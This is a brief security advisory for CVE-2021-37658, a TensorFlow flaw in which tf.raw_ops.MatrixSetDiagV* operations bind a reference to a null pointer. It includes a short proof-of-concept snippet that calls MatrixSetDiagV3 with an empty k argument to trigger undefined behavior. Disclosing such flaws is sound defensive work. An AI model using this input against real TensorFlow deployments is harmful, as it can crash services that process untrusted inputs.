CVE-2021-37658: Reference binding to nullptr in `MatrixSetDiagV*` ops

August 25, 2021 (updated November 13, 2024)

An attacker can cause undefined behavior via binding a reference to null pointer in all operations of type tf.raw_ops.MatrixSetDiagV*:

import tensorflow as tf

tf.raw_ops.MatrixSetDiagV3(
input=[1,2,3],
diagonal=[1,1],
k=[],
align='RIGHT_LEFT')
